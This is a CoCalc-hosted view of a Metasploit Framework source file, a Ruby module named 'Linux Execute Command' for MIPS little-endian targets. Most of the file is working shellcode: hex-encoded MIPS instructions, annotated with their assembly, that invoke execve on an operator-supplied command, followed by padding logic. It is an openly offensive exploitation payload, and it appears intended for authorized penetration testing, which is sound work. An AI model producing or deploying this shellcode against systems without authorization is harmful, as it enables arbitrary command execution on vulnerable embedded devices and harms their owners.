CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/linux/mipsle/exec.rb
Views: 11782
1
# -*- coding: binary -*-

2


3
##

4
# This module requires Metasploit: https://metasploit.com/download

5
# Current source: https://github.com/rapid7/metasploit-framework

6
##

7


8
module MetasploitModule

9


10
  CachedSize = 52

11


12
  include Msf::Payload::Single

13
  include Msf::Payload::Linux

14


15
  def initialize(info = {})

16
    super(merge_info(info,

17
      'Name'          => 'Linux Execute Command',

18
      'Description'   => %q{

19
        A very small shellcode for executing commands.

20
        This module is sometimes helpful for testing purposes as well as

21
        on targets with extremely limited buffer space.

22
         },

23
      'Author'        =>

24
        [

25
          'Michael Messner <devnull[at]s3cur1ty.de>', #metasploit payload

26
          '[email protected]'  #original payload

27
        ],

28
      'References'    =>

29
        [

30
          ['EDB', '17940']

31
        ],

32
      'License'       => MSF_LICENSE,

33
      'Platform'      => 'linux',

34
      'Arch'          => ARCH_MIPSLE,

35
      'Payload'       =>

36
        {

37
          'Offsets' => {} ,

38
          'Payload' => ''

39
        })

40
    )

41
    register_options(

42
      [

43
        OptString.new('CMD', [ true, "The command string to execute" ]),

44
      ])

45
  end

46


47
  #

48
  # Returns the command string to use for execution

49
  #

50
  def command_string

51
    return datastore['CMD'] || ''

52
  end

53


54
  def generate(_opts = {})

55


56
    shellcode =

57
      "\x66\x06\x06\x24" + # li a2,1638

58
      "\xff\xff\xd0\x04" + # bltzal a2,4100b4

59
      "\xff\xff\x06\x28" + # slti a2,zero,-1

60
      "\xe0\xff\xbd\x27" + # addiu sp,sp,-32

61
      "\x01\x10\xe4\x27" + # addiu a0,ra,4097

62
      "\x1f\xf0\x84\x24" + # addiu a0,a0,-4065

63
      "\xe8\xff\xa4\xaf" + # sw a0,-24(sp)

64
      "\xec\xff\xa0\xaf" + # sw zero,-20(sp)

65
      "\xe8\xff\xa5\x27" + # addiu a1,sp,-24

66
      "\xab\x0f\x02\x24" + # li v0,4011

67
      "\x0c\x01\x01\x01"   # syscall 0x40404

68


69
    #

70
    # Constructs the payload

71
    #

72


73
    shellcode = shellcode + command_string + "\x00"

74


75
    # we need to align our shellcode to 4 bytes

76
    while shellcode.bytesize%4 != 0

77
      shellcode = shellcode + "\x00"

78
    end

79


80
    return super + shellcode

81


82
  end

83
end

84


85